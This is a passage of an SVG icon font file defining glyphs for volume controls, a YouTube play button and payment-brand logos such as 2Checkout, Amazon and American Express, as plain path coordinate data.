<glyph glyph-name="volume-mute" horiz-adv-x="1000" unicode="&#xecb8;" d="M315 293v-15l159 300c-49-27-98-54-147-81-9-6-13-11-13-22 1-61 0-122 1-182z m378 96c0 84 0 169 0 253l0 2-312-585c88-47 176-95 265-142 26-14 47-1 47 30 0 82 0 165 0 248 0 8 2 15 7 21 37 43 37 105 1 148-6 8-9 15-8 25z m-432-211c0 38 0 75 0 113 0 59 0 118 0 177 0 9-2 12-12 11-47 0-95 1-143 0-35 0-57-22-57-58 0-87 0-174 0-261 0-32 23-56 55-56l117-1 40 75z m589 315c-4 4-8 8-15 1-24-25-49-49-74-74-5-5-4-7 2-11 94-55 90-184 3-236-7-4-6-7-1-12 24-23 47-47 70-71 7-7 12-7 19-1 63 52 95 118 97 202-1 82-34 150-101 202z m-134 346l-10 5c-22 12-50 4-62-18l-496-903c-12-22-4-49 18-62l11-5c22-12 50-4 62 18l495 903c13 22 4 49-18 62z" />
<glyph glyph-name="volume-off" horiz-adv-x="1000" unicode="&#xecb9;" d="M755 350v415c0 4 1 7 0 10-1 11-7 15-16 11-7-3-13-8-18-13-93-81-186-163-278-244-12-10-24-15-39-15-46 0-93 0-139 0-17 0-21-4-21-20v-287c0-17 4-21 21-21 46 0 93 0 140 0 13 0 24-2 34-11 94-83 187-165 281-247 6-5 13-10 20-14 8-4 13 1 15 8 1 5 0 9 0 13v415h0z" />
<glyph glyph-name="volume-up" horiz-adv-x="1000" unicode="&#xecba;" d="M407 351v280c0 2 0 5 0 7-1 7-5 10-11 7-5-2-9-5-12-8-63-55-125-110-188-165-7-7-16-10-26-10-31 0-62 0-93 0-12 0-14-3-14-14v-193c0-11 2-14 13-14h95c9 0 16-2 23-8 63-55 126-110 189-166 4-3 9-6 14-9 5-3 8 0 10 5 0 3 0 6 0 9 0 93 0 186 0 279z m429 308c-17 25-35 50-54 75-5 7-15 8-21 2-17-14-33-27-49-40-6-6-10-13-8-15 1-1 2-3 3-4 44-54 81-112 106-176 25-66 36-133 27-203-9-73-37-139-79-199-16-23-33-45-51-67-5-7-5-18 2-24 14-13 29-27 44-41 6-6 13-9 16-6 1 1 2 3 4 4 45 51 83 105 112 167 49 103 62 210 37 322-16 74-48 142-89 205z m-205-7c-15-14-30-28-45-41-6-6-11-12-10-13 0-1 1-1 1-2l8-8c31-35 57-72 77-114 26-56 37-115 27-177-10-59-36-111-70-159-6-9-13-17-19-25-5-7-4-17 2-23 16-13 31-26 46-39 7-6 17-5 23 1 158 187 153 414-17 599-6 6-17 7-23 1z m-120-82c-14-14-27-29-41-44-6-6-6-16 0-23 42-42 75-89 79-151 3-61-24-111-61-158-5-7-5-17 2-23 16-13 31-26 46-39 7-6 17-6 23 1 128 155 102 318-25 438-7 6-17 6-23-1z" />
<glyph glyph-name="youtube-play" horiz-adv-x="1000" unicode="&#xecbb;" d="M1000 421h-2c0 10 0 19 0 29 0 10-1 19-2 29 0 12-2 24-3 36s-1 24-3 35c-4 18-9 35-14 52-4 15-11 30-22 42-23 27-53 41-88 45-19 2-38 3-56 4-17 1-34 2-52 3-25 1-51 2-77 2-25 1-51 2-76 2-49 0-99 1-149 0-50 0-100-1-150-2-22-1-43-1-64-2-7 0-13-1-20-1-22-1-44-2-66-4-15-1-30-3-44-6-32-8-57-25-74-53-13-20-20-42-24-66-4-19-6-38-8-57-2-19-3-39-4-58-1-16-2-32-2-48 0-45 0-90 1-135 0-12 1-23 2-34 1-16 2-32 4-48 1-12 1-24 3-36 3-20 9-40 16-59 13-36 39-59 74-71 23-8 47-10 70-12 19-2 38-2 57-3 16-1 32-2 48-2 24-1 49-1 74-2 23 0 46-1 68-1 41 0 81-1 121-1 50 1 101 2 151 3 21 1 42 1 62 2 7 0 14 0 21 1 22 1 45 2 68 4 14 1 28 2 42 5 44 10 76 35 92 78 11 29 17 59 19 90 2 17 3 35 4 52 1 23 2 45 3 68 0 39 0 79 0 119z m-603-201v281c90-47 179-94 270-141-90-47-180-93-270-140z" />
<glyph glyph-name="2checkout-alt" horiz-adv-x="1000" unicode="&#xecbc;" d="M847 696v0h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-616-384h-60v16l28 22c2 1 3 2 4 3 1 0 1 1 1 1 4 3 5 6 5 9 0 4-3 7-7 8 0 0-1 0-1 0s-2 0-2 0c-4-1-8-4-13-10l-14 12c4 6 9 10 14 13 1 0 2 1 3 1 4 1 8 2 13 2 17 0 28-10 28-24v0c0-12-6-19-17-27l-13-9h31v-17z m57 1c-1 0-1 0-2 0-3-1-7-2-12-2-21 0-39 16-39 39v0c0 22 17 39 40 39 3 0 6 0 9-1 10-2 18-7 23-15l-16-12c-4 5-8 8-13 9-1 0-2 0-3 0-1 0-3 0-4 0 0 0-1-1-2-1-5-2-9-6-11-11l0-1c0-1 0-1 0-2l-1-2 0-2v-1c0-11 7-20 18-20 4 0 7 1 10 3s4 3 7 6l3-2 12-9c-1-2-3-4-5-6 0 0-1-1-1-1-4-3-8-6-12-7-1-1-1-1-1-1z m93-1h-21v29h-26v-29h-21v76h21v-29h26v29h21v-76z m71 58h-40v-12h36v-16h-36v-12h40v-18h-61v76h61v-18z m56-57c-4-1-8-2-12-2-22 0-39 16-39 39v0c0 22 17 39 39 39 5 0 9-1 13-2 8-2 14-7 19-14l-16-12c-3 4-6 7-10 8 0 0-1 0-1 0l-1 1c-1 0-3 0-4 0-2 0-4 0-6-1 0 0-1 0-1-1-2-1-4-2-5-3-1-1-1-2-2-2 0-1-1-2-1-3-2-3-3-6-3-10v0c0-11 8-20 18-20 6 0 11 2 14 6l1 1s1 1 1 1c0 0 1 1 1 1l16-11c-5-7-12-13-21-15z m73-1l-18 28-8-8v-20h-21v76h21v-31l26 31h25l-29-33 29-43h-25z m100 38c0-21-17-39-40-39-23 0-40 17-40 39v0c0 22 17 39 40 39 23 0 40-17 40-39v0z m77-4c0-24-14-35-35-35s-35 11-35 34v43h21v-42c0-11 6-16 14-16s14 5 14 15v43h21v-42z m71 23h-23v-57h-21v57h-22v19h66v-19z m-169-19v0c0-11-7-20-19-20-11 0-19 9-19 20v0c0 11 8 20 19 20 11 0 19-9 19-20z" />
<glyph glyph-name="2checkout" horiz-adv-x="1000" unicode="&#xecbd;" d="M257 350v0c0 34 26 61 62 61 13 0 24-3 33-8-23 73-91 127-172 127-99 0-180-81-180-180s81-180 180-180c81 0 150 54 172 128-9-5-21-9-33-9-36 0-62 28-62 61z m-117-60h-85v18l40 34c16 14 21 22 21 32 0 12-8 18-19 18-11 0-18-5-27-17l-15 11c11 16 22 25 43 25 23 0 38-14 38-35v-1c0-18-9-29-30-46l-24-21h58v-18z m71 18c12 0 21 5 29 12l14-14c-11-10-25-17-44-17-34 0-61 27-61 61v0c0 34 26 61 62 61 20 0 33-6 44-16l-14-14c-9 7-18 11-30 11-22 0-39-18-39-41v-1c0-23 17-42 39-42z m109 84c-23 0-40-18-40-41v-1c0-23 17-42 41-42s40 19 40 42v0c0 23-17 42-41 42z m147-50c10 7 15 11 15 21v1c0 12-9 20-24 20-12 0-19-5-26-14l12-10c5 6 9 9 13 9s7-3 7-7c0-4-1-7-7-12l-24-18v-15h49v18h-26l11 7z m54-9c-9 0-16 8-16 18v0c0 9 7 17 16 17 6 0 11-3 14-8l14 11c-6 8-14 13-28 13-19 0-34-14-34-33v-1c0-19 15-33 34-33 14 0 22 6 28 15l-13 9c-4-5-8-8-15-8z m420 51v-18h23v-49h18v49h18v18z m-301-40h31v13h-31v9h36v18h-54v-67h54v18h-36z m279 3c0-10-4-14-11-14s-12 5-12 14v37h-18v-37c0-21 11-30 29-30s30 9 30 30v37h-18v-37z m-112 37h-21l-25-27v27h-18v-67h18v18l8 7 17-25h22l-25 38z m-94-51c-9 0-15 8-15 18v0c0 9 6 17 15 17 6 0 10-3 14-8l13 11c-5 8-13 13-26 13-20 0-34-14-34-33v-1c0-19 14-33 33-33 14 0 22 6 28 15l-13 9c-4-5-8-8-15-8z m125 51c-20 0-36-15-36-33v-1c0-18 16-33 36-33s36 15 36 34v0c0 18-16 33-36 33z m18-34c0-9-8-17-18-17-10 0-18 8-18 18v0c0 9 8 17 18 17s18-8 18-17v-1z m-261 7h-23v27h-18v-67h18v27h23v-27h18v67h-18z" />
<glyph glyph-name="amazon-alt" horiz-adv-x="1000" unicode="&#xecbe;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-407-324c2 8 6 15 14 20 5 4 11 6 17 8 5 1 11 1 16 2l10 1c0 0 1 1 1 1 0 5 1 9-1 14-2 4-5 6-10 7-5 1-9 0-14-3-2-2-4-5-4-8-1-3-3-4-6-4-5 1-10 1-16 2-3 0-5 2-4 6 2 5 4 10 8 15 4 4 9 8 14 10 10 4 21 4 31 3 6-1 12-3 17-6 6-4 11-10 12-17 0-4 1-8 1-13 0-12 0-25 0-38 0-6 2-11 5-16 1-1 2-3 3-4 1-2 1-3-1-4-5-4-9-9-14-13-2-2-5-2-6 0-4 3-7 7-10 11 0 1-1 1-1 2-2-2-4-4-6-6-7-6-15-9-25-9-5 0-10 1-14 3-7 2-12 7-14 13-4 7-4 15-3 23z m-147 71h17c3 0 4-1 4-4v-11l0-1 1 0c4 12 13 18 26 19 13 0 21-7 26-19 1 3 2 5 4 7 4 6 10 10 17 11 7 1 14 0 20-3 8-4 12-10 13-18 1-4 1-8 1-12 0-3 0-6 0-10v-63c0-3-1-4-4-4h-19c-3 0-4 1-4 4v54c0 5 0 11 0 16 0 3-1 6-3 8-4 4-11 4-15 1-5-2-7-6-7-11-1-3-1-7-1-10 0-19 0-39 0-58 0-3-1-4-4-4h-19c-3 0-4 1-4 4v55c0 4 0 8 0 13-1 2-1 5-2 7-3 5-7 7-12 6-7 0-10-5-11-11-1-4-1-8-1-12 0-19 0-39 0-58 0-1 0-3-2-4 0 0-1 0-2 0-7 0-13 0-19 0-3 0-4 1-4 4v100c-1 3 1 4 4 4z m-41-108c-4 3-7 7-10 11 0 1 0 1 0 1-2-1-4-3-6-5-7-6-15-9-25-9-5 0-10 0-15 2-6 3-11 8-14 14-1 3-2 6-3 9 0 1 0 1 0 2v8c1 3 1 5 2 8 2 8 7 14 14 18 6 4 13 6 19 6 8 2 15 2 22 3 1 0 2 1 2 2 0 3 0 6-1 10 0 5-4 9-10 10-5 1-10 0-14-3-3-2-4-5-5-8 0-2-2-4-5-4-5 1-11 1-16 2-3 0-5 2-4 5 2 8 5 15 12 20 5 4 12 7 19 8 7 2 15 2 23 1 8-2 15-4 20-10 5-5 8-11 8-17 0-9 0-17 0-26 1-7 1-14 0-21 0-6 2-11 6-16 1-2 2-3 3-4 1-2 0-3-1-4l-15-13c-2-2-4-2-6 0z m326-38c-1-1-2-2-4-3-2-2-5-4-7-6l-3-1-11-6c-1-1-3-1-4-2l-2-1c-3-1-6-3-9-4-1-1-3-1-5-2-4-2-9-4-14-5-3-1-6-2-9-3l-5-2c-4-1-8-1-12-2-1-1-2-1-4-1-1 0-1-1-2-1l-7-1c-2 0-5-1-8-1-3 0-7-1-10-1-2 0-3 0-5 0-3-1-7-1-11-1-5-1-10 0-15 0-6 0-11 0-16 1s-10 1-15 2c-2 0-5 0-7 1-2 0-5 1-7 1-2 0-3 1-4 1-1 0-2 0-3 1-1 0-3 1-4 1-2 0-4 1-5 1l-7 2s-4 1-6 2c-1 1-2 1-3 2l-1 0c-3 1-5 2-8 3-3 1-6 2-9 3-4 2-8 4-12 6-3 2-6 3-9 5-2 2-5 3-7 4-4 3-8 5-11 8-2 1-3 2-5 3l-5 4c-3 2-5 4-8 6l-3 2c-1 2-3 3-5 5 0 1-1 1-1 2 0 2 2 3 4 2 2-1 3-1 4-2 3-2 6-4 9-5 4-2 8-4 12-5 1-1 3-3 5-4 1 0 2 0 3 0 1-1 3-2 5-3l2 0 7-3c2-1 4-2 6-2 2-1 4-2 7-3l2-1c2 0 4-1 5-1l8-2c2-1 4-1 6-2 1 0 2-1 3-1 0 0 0 0 1 0 2-1 5-1 8-2 2 0 4-1 6-1 2-1 4-1 7-2 5-1 11-2 17-2 5-1 11-2 16-2 13-2 27-2 40-1 4 0 9 0 13 0 6 1 13 2 19 2 2 0 5 0 7 1 1 0 2 0 3 1 5 0 9 1 13 2 3 0 5 1 8 1l6 2c2 1 5 1 7 2 2 0 5 1 8 2 2 1 4 1 6 2 2 1 5 2 7 2 2 1 5 2 8 3 2 1 5 2 8 3s5 2 8 3c2 0 4-1 5-2 1-1 1-4-1-5z m29 4l-1-3c-1-2-2-5-3-7-1-3-3-6-4-8-1-2-2-5-4-6-1-2-3-4-5-6-1-1-2-2-4-3 0 0-1 0-2 0 0 0-1 1 0 2 0 1 0 1 1 2 0 0 0 1 0 1 1 2 1 4 2 6s1 4 3 6c0 1 0 2 0 3 2 5 3 10 4 15 1 2 0 5 1 8 0 0-1 1-1 1-2 3-5 4-8 4-5 1-9 1-13 1-6 0-13-1-19-2-2 0-3 0-5 0-1 0-2 1-2 1 0 1 0 2 1 2 1 1 3 2 5 4 1 0 2 1 3 0-1 1 0 1 1 1 3 1 6 3 9 4 3 0 6 1 10 1 2 1 4 1 6 1 7 1 13 0 20-1 2-1 3-2 5-2 2-1 2-3 2-4 1-7 0-14-2-21z m12 37c-5 2-10 5-16 6-5 1-10 1-15 2-7 0-14-1-21-2-5-2-10-4-15-6-3-2-5-1-6 2 0 2 0 3 0 4 0 4 0 9 0 13 0 4 2 8 5 12 7 10 14 20 21 31 5 7 10 14 15 21 0 0 1 0 1 1h-2c-11 0-21 0-31 0-4 0-5 2-5 4v13c0 3 1 5 5 5h63c3 0 5-2 5-5 0-3 0-6 0-8 0-4-1-7-3-10l-20-28c-5-7-10-14-15-22 0 0 0 0-1-1l1 0c3 0 6 0 9 0 9-1 19-3 28-8 2-1 3-3 3-6 0-5 0-10 0-15 0-3-3-5-6-3z m105 39c-1-9-4-17-9-25-4-6-9-11-16-15-6-3-13-5-19-5-12 0-22 4-30 12-5 5-9 11-11 19-3 9-5 18-5 27 1 10 2 20 6 29 4 9 10 17 20 22 5 3 10 4 16 5 10 0 19-2 27-7 5-4 9-9 13-14 5-10 8-20 8-30 1-6 1-12 0-18z m92-43h-18c-3 0-4 2-4 5v62c0 4-1 8-2 11-1 4-3 7-6 8-6 2-11 0-14-5-3-3-4-8-5-12 0-4 0-7 0-11v-53c0-3-2-5-5-5h-18c-3 0-5 2-5 5v100c0 3 2 4 5 4h17c3 0 4-1 4-4v-14l1 0c0 2 1 4 2 6 3 6 7 10 13 12 3 1 5 2 8 2 8 1 15 0 21-5 6-4 8-10 10-17 1-6 1-13 1-19v-65c0-3-1-5-5-5z m-582 53c-5 0-10-1-15-3-4-1-7-3-9-7-2-5-3-10-1-16 2-7 9-9 16-7 6 2 9 7 11 13 1 5 1 9 1 14v5c0 1 0 2-1 2-1-1-1-1-2-1z m252-33c6 3 9 8 11 13 1 5 1 9 1 14v3c0 3 0 3-3 3h-1c-5 0-10-1-15-3-3-1-6-4-8-7s-3-8-2-12c1-10 9-14 17-11z m206 60c-1 5-3 9-8 10-6 2-12 0-15-5-2-3-4-7-4-10-1-6-1-12-2-18h1l0-13c0-2 1-4 1-7 1-4 2-9 5-13 4-5 11-6 16-3 4 2 5 6 7 10 1 5 2 10 2 15 0 7 0 13 0 19 0 5-1 10-3 15z m-108-85v0h4v0h-4z" />
<glyph glyph-name="amazon" horiz-adv-x="1000" unicode="&#xecbf;" d="M147 353c-1 2-2 4-4 6-6 8-9 16-8 26 0 11 0 22 0 32-1 14 0 27-1 40-1 10-4 20-12 27-9 9-20 13-32 15-12 2-24 2-36-1-11-2-21-6-30-12-10-8-15-19-18-31-2-6 2-8 6-9 9-1 17-1 26-3 4 0 7 3 7 6 1 5 4 10 8 13 7 5 14 6 21 5 9-1 16-8 17-17 0-5 0-10 0-15 0-2 0-2-2-2-11-2-23-3-34-5-10-1-20-4-30-10-10-6-18-15-22-28-1-4-2-8-3-12v-13c0-1 1-1 1-2 0-5 2-10 4-15 4-10 11-17 21-21 8-3 16-4 24-3 15 0 27 4 38 13 3 3 6 6 10 9 0-1 0-1 1-2 4-6 9-12 15-17 3-3 6-3 9 0l23 19c2 2 3 4 1 7z m-56 45c0-7 0-15-2-21-3-10-8-17-17-21-10-4-22 0-25 12-3 8-2 16 2 24 3 5 7 9 13 12 8 3 15 4 24 4 1 0 2 0 3 0 2 1 2 0 2-2 0-3 0-5 0-8z m86-72c10 0 20 0 30 0 1 0 2 0 4 1 2 1 2 3 2 6 0 30 0 60 0 90 0 6 1 12 2 18 1 10 7 17 17 18 8 1 15-1 18-9 2-4 3-8 3-12 1-7 1-14 1-20 0-18 0-35 0-52v-33c0-5 1-7 7-7h28c5 0 7 2 7 7 0 30 0 60 0 90 0 5 1 11 1 16 1 7 4 13 11 17 7 5 18 4 23-2 4-3 5-8 5-13 0-8 0-16 0-24v-84c0-5 2-7 7-7h29c5 0 7 2 7 7v98c0 5 0 10 0 15 0 7-1 13-2 20-2 12-9 21-20 27-10 5-20 7-31 5-11-2-21-8-27-17-3-3-5-7-7-11-7 18-20 29-40 29-20-1-33-11-40-29l-1 0c0 0 0 1 0 2v17c0 4-2 6-7 6h-27c-4 0-6-2-6-7v-156c0-4 2-6 6-6z m255 1c8-3 15-3 23-3 15 0 27 4 38 13 4 3 7 6 10 9 1-1 1-1 1-2 4-6 9-12 15-17 3-3 7-3 10 0l23 19c2 2 2 4 1 6-1 3-3 5-4 7-6 8-9 16-9 26 0 19 0 39 0 59 0 6-1 13-2 20-2 11-8 20-17 26-9 5-18 8-27 9-17 3-33 1-48-4-9-4-17-9-23-16-6-7-10-15-12-24-1-5 1-8 7-9 8 0 17-1 25-2 5-1 7 2 8 6 1 5 3 9 7 12 7 5 14 7 22 5 7-1 12-4 15-11 3-7 2-14 2-22 0 0-1-1-1-1-6 0-11-1-16-2-9-1-17-2-26-3-9-2-18-6-26-12-11-8-18-18-21-32-2-12-2-24 3-36 5-10 12-17 22-21z m22 64c3 6 8 10 14 13 7 3 15 4 23 4h1c5 0 5 0 5-5v-5c0-7 0-14-2-22-3-8-8-16-16-19-13-6-26 0-28 16 0 6 0 12 3 18z m546 43c0 10 0 20-2 30-2 10-6 19-15 26-9 7-20 10-32 8-5 0-9-1-14-3-9-3-14-10-19-19-2-3-3-6-4-9l-1 0v22c0 4-2 6-6 6h-28c-4 0-6-2-6-6v-156c0-5 2-7 7-7h28c5 0 7 2 7 7v83c0 5 1 11 1 16 1 7 3 14 7 20 5 7 13 10 22 7 5-2 8-6 10-11 2-6 2-12 3-18 0-32 0-64 0-97 0-5 1-7 7-7h28c5 0 7 2 7 8v100z m-164 32c-5 9-12 16-20 22-13 9-27 12-42 11-9-1-17-3-25-7-15-8-24-20-31-35-6-14-8-29-9-44 0-15 2-29 7-43 4-12 10-22 18-30 13-12 28-17 47-17 9-1 19 2 29 7 10 5 18 14 25 24 7 11 12 25 14 38 1 9 1 18 0 28-1 16-5 32-13 46z m-32-69c0-8-1-16-4-23-2-7-5-12-11-16-8-5-19-3-24 5-5 6-7 13-8 20-1 4-1 7-1 11-1 6-1 13-1 20 0 0-1 0-1 0 1 9 2 18 3 27 1 6 3 11 6 16 5 9 14 11 23 9 8-3 12-8 14-16 2-8 3-15 4-23 0-10 0-20 0-30z m-181-122c-3 2-5 3-8 2-4-1-8-2-13-4s-8-3-12-5c-5-1-9-2-13-4l-10-3c-3-2-7-2-10-4-4-1-8-2-13-3-3-1-6-2-10-3-3 0-7-2-10-2-4-1-8-2-11-2-7-2-14-3-21-4-2-1-3-2-5-2-4 0-7 0-11-1-10 0-20-1-30-2-6-1-13-1-20-1-20-1-41-1-62 1-8 1-16 2-25 3-9 1-18 3-27 5-4 0-7 1-11 1-3 1-6 2-9 3l-12 2c-1 0-1 1-2 1-1 1-2 1-4 2l-9 2c-4 1-8 2-13 3-2 1-5 2-8 3l-4 2c-3 1-7 2-10 3-3 1-6 2-8 3l-11 5c-2 0-3 0-4 1-3 1-6 2-8 3-2 1-3 1-4 2-3 1-6 3-9 5-6 3-12 5-18 8-5 3-9 5-13 8-3 1-5 3-7 4-3 1-6 0-6-4 0-1 0-2 1-3 3-2 6-5 8-7l4-3c5-4 9-7 13-10 3-2 5-4 8-6 3-2 5-4 7-6 6-3 11-7 17-11 4-2 8-4 11-6 5-4 10-5 14-8 6-4 13-6 20-9 4-3 9-4 14-6 4-2 8-3 12-4l1-1c2-1 3-2 5-2 3-1 7-2 10-3s7-2 10-4c2 0 5-1 8-1 2-1 4-1 7-2 1-1 2-1 4-1 2 0 4-1 6-2 4 0 8-1 11-2 4 0 8-1 11-1 8-2 16-3 24-3 8-1 16-2 24-2 8 0 16 0 24 0 6 0 12 1 17 1 3 1 5 0 8 1 5 0 11 1 16 2l12 1c4 1 7 1 11 2 1 0 2 2 3 1 2 0 4 1 7 1 5 1 11 3 17 4 3 1 5 2 8 3 5 1 10 2 14 4 8 2 15 5 23 8 3 1 5 2 8 3 4 2 9 4 13 6l3 2c2 1 4 1 6 3 6 3 11 6 17 9 2 1 3 2 5 3 4 2 8 5 12 8 2 2 4 3 6 5 2 2 2 7 1 8z m66 94c-13 7-28 11-43 12-5 0-9 0-14 0 0 0 0 1 0 1 0 0 0 1 1 2l23 33c10 15 21 29 31 44 3 4 5 9 5 15-1 4 0 8 0 13 0 5-3 7-8 7h-99c-5 0-7-2-7-7v-20c0-4 2-7 7-7 16 0 32 0 49 0h3l-1-2-23-33c-11-16-22-32-34-48-4-5-7-11-7-18 1-7 0-14 0-20 0-2 0-4 0-6 1-4 5-6 9-4 8 4 16 7 24 9 11 3 21 4 32 3 8 0 16-1 24-3 9-2 17-5 25-9 4-2 8 0 8 5 1 8 1 16 0 24 0 4-1 7-5 9z m-22-57c-3 1-6 2-9 3-10 2-20 3-31 2-3 0-6 0-10-1-5-1-10-1-15-3-5-1-9-3-14-5-1 0-2-1-1-2-2 1-3 1-5 0-2-2-5-4-8-6 0-1-1-2-1-4 0 0 2 0 3 0 3 0 5 0 8 0 10 1 20 3 29 2 7 0 14 0 20 0 6-1 11-2 14-7 0-1 0-1 0-2 0-4 1-8 0-13-2-7-3-15-6-22-1-2 0-4-1-6-2-2-3-6-4-9-1-3-2-6-3-9 0-1-1-1-1-1-1-1-2-2-2-3 0-2 1-3 1-4 1 0 3 0 4 1 2 1 3 3 5 4 3 3 6 6 8 9 2 3 4 6 6 9 3 4 5 9 7 13 2 4 3 8 4 12 0 1 1 3 2 4 2 11 5 21 4 32-1 3-2 5-4 6z m-36 5v0h5v0h-5z" />
<glyph glyph-name="american-express-alt" horiz-adv-x="1000" unicode="&#xecc0;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-467-247c1 0 2 0 2 0 16 0 31 0 47 0 8 0 16-4 18-13 2-9 0-20-9-24l-2-1c7-3 11-9 11-15 0-5 1-10 1-16 0-1 0-2 0-3h-18c0 2-1 5-1 8 0 3 0 6-1 9 0 4-4 7-7 7-8 0-15 0-23 0v-25h-19c1 25 1 49 1 73z m-236 0c7 0 15 0 22 0 1 0 2-1 3-2 6-13 12-26 17-39 4-9 8-18 12-26v67h19c10 0 10 0 14-9 5-10 9-20 14-30 1-3 2-5 4-9 7 17 14 32 21 48h30v-72h-19v50l-1 0c-4-9-8-18-12-27l-10-22c-1-1-2-2-3-2-3 0-6 0-10 0-5 0-5 0-7 5-7 15-13 29-20 44 0 1 0 1-1 2v-51h-19c-5 0-10 0-15 0-2 0-3 1-4 3-2 4-3 8-5 12 0 1-2 1-3 1-10 1-21 1-31 0-1 0-2 0-3-1-2-5-4-10-6-15h-20c11 25 22 49 33 73z m163-160c-3-8-9-12-17-12-10-1-20-1-31-1v-25h-12c-6 0-13 0-19 0-4-1-6 2-8 4-6 7-11 13-17 20-3-3-5-5-7-8-4-5-8-9-12-14-1-1-2-2-4-2-21 0-43 0-65 0-1 0-1 1-1 1v72h3c21 0 42 0 62 0 5 1 7-2 10-5 5-5 10-11 15-17 6 7 12 14 18 20 1 2 3 2 5 2 21 0 42 0 62 0 11 0 19-7 20-18 0-6 0-12-2-17z m4 160h59v-16h-40v-13h38v-15h-38v-13h40v-15h-59v72z m73-174c0-3 1-5 1-8 0-5 0-11 0-16h-18c0 3 0 7 0 10-1 3-1 5-1 8-1 4-4 7-8 7-7 0-15 0-23 0v-25h-18v73c1 0 2 0 3 0 15 0 31 0 46 0 8 0 16-4 18-13 2-9 0-20-8-25-1 0-1-1-2-2 6-1 9-4 10-9z m69 33h-41v-13h40v-14h-40v-14h41v-15h-59v72h59c0-5 0-10 0-16z m4 141h18v-72h-18v72z m62-187c-3-6-9-10-15-10-14-1-28-1-42-1-1 0-1 0-1 0v16h5c8 0 16 0 24 0 2 0 5 0 7 1 3 0 6 4 5 6 0 3-3 5-7 6-7 0-14 0-21 2-10 2-14 7-15 18 0 5 0 10 3 14 3 6 8 10 15 10 13 0 27 0 41 0 0 0 0 0 0 0v-16h-34c-4 0-7-3-6-7 1-4 5-4 8-5 5 0 10 0 14 0 4-1 8-2 12-3 5-2 8-6 9-12 1-6 2-13-2-19z m66-1c-3-6-9-9-15-9-14-1-28-1-42-1v16h4c10 0 20 0 30 1 3 0 5 1 6 3 3 4 0 8-6 9-7 0-14 1-21 2-10 2-15 9-15 19 0 5 0 11 4 16 3 5 8 7 14 7 13 1 27 0 41 0v-16h-34c-3 0-6-2-6-5 0-2 1-4 3-5 2-1 4-1 5-1 6-1 13-1 19-2 10-1 15-5 16-16 1-6 1-13-3-18z m92 115h-13c-2 0-4 0-6 0-5-1-7 1-9 5-9 15-19 30-28 46v-51h-5c-10 0-19 0-29 0-2 0-3 0-4 2-1 4-3 8-5 12 0 1-2 2-3 2-11 0-22 0-33 0-2-5-4-9-6-14 0-2-1-3-4-2-6 0-12 0-19 0-16 0-25 7-29 23-3 11-2 23 2 33 4 10 12 18 24 17 8 0 15 0 23 0v-16h-14c-6 0-11-2-15-8-5-7-4-22 2-28 5-4 11-4 16-4 1 0 2 2 2 2 4 9 8 18 12 27l10 25c1 1 1 1 1 2 8 0 15 0 23 0 1 0 2-1 2-2 6-11 11-22 16-34 4-10 8-19 13-29v65c7 0 13 0 18 0 8 1 12-1 15-8 7-14 16-27 24-40v48h19c0-24 0-49 0-73z m-128 32h22c-4 9-8 17-12 27-4-10-7-18-10-27z m-379-99c-9 0-18 0-27 0h-12v-14h40v-13h-40v-16c14 0 27 0 40 0 1 0 2 1 3 2 6 7 12 14 18 21-6 6-12 12-18 18-1 1-3 2-4 2z m46-18c-1-2-1-3 0-4l17-21c3-2 5-5 8-8v60c-1-1-2-2-3-2l-22-25z m69 17c-9 0-18 0-27 0v-17c9 0 18 0 27 0 3 0 6 5 6 9 0 4-2 8-6 8z m-130 127c-4-10-7-18-11-27h23c-4 9-8 17-12 27z m205-126c-8 0-16 0-25 0v-17c8 0 16 0 24 0 6 0 8 3 8 8 1 4-3 9-7 9z m70 117c0 4-4 8-9 8-3 0-5 0-8 0h-15v-17c8 0 16 0 24 0 6 0 8 3 8 9z" />
<glyph glyph-name="american-express" horiz-adv-x="1000" unicode="&#xecc1;" d="M923 392v119h-31v-79c-13 23-27 44-39 66-6 11-12 15-24 14-9-1-19 0-29 0v-107c-8 16-15 32-23 48-8 18-16 37-25 55 0 2-2 3-4 3-12 1-25 1-37 1 0-2-1-3-1-4-6-13-12-27-18-40-6-15-12-30-19-44 0-2-2-4-3-4-9 0-18-1-25 7-10 10-13 33-4 46 5 8 15 12 25 12 7 0 15 0 22 0v27c-13 0-25-1-37 0-19 0-33-13-39-28-7-17-8-36-4-54 7-26 22-38 48-38 10 0 21 0 31 0 4-1 5 1 7 4 2 7 5 15 8 22 19 0 37 0 55 0 1 0 4-1 4-3 3-6 6-13 9-19 1-3 3-4 7-4 15 0 31 0 46 0h8v84c16-26 31-50 46-75 4-7 7-11 15-9 4 0 7 0 10 0h21z m-210 53c6 14 12 28 18 43 7-15 13-29 20-43h-38z m-202-137c-33 0-67 0-101 0-3 0-6-1-8-3-10-11-20-22-30-33-8 10-16 19-24 28-4 5-8 8-16 8-33 0-67 0-100 0h-6v-118c0-1 1-1 1-1 36 0 72 0 107 0 2 0 4 1 5 3 7 7 13 15 20 22 4 5 8 9 12 13 9-11 18-21 27-32 4-4 7-8 14-7 10 0 21 0 31 0h19v42c18 0 35-1 52 0 12 1 22 7 26 20 4 9 4 18 3 28-1 18-13 30-32 30z m-186-92c-2-1-4-2-6-2-21-1-43-1-65-1v26h65v20h-65v24h19c15 0 30 0 45 0 2 0 4-1 6-2 10-10 20-20 30-31-10-11-20-22-29-34z m108-16c-4 5-8 9-12 13-10 12-19 23-29 34-2 3-2 4 0 6 12 14 24 27 36 41 1 1 3 2 5 4 0-33 0-65 0-98z m71 54c-14 0-28 0-43 0v28c15 0 30 0 44 0 6-1 10-8 10-14 0-6-5-13-11-14z m-265 141c6 13 11 25 17 37 7 15 14 29 20 44 1 0 1-1 1-1v-82h30v119h-48c-12-26-23-51-35-78-2 5-4 9-6 13-7 17-15 33-22 49-7 16-6 16-23 16h-31v-110c-7 14-13 28-19 42-10 22-19 43-29 65-1 1-2 2-4 3-12 0-25 0-37 0-18-40-35-79-53-119h33c3 8 6 16 10 23 1 2 3 3 5 3 17 0 33 0 50 0 2 0 4-1 5-3 3-6 5-12 8-19 1-3 3-4 6-4 8 0 17 0 25 0h31v82c1-1 1-2 2-3 10-23 21-47 32-71 3-8 3-8 12-8 5 0 11 0 16 0 1 0 4 1 4 2z m-185 50c6 14 12 28 19 43 6-15 12-29 18-43h-37z m613-159c-4 15-16 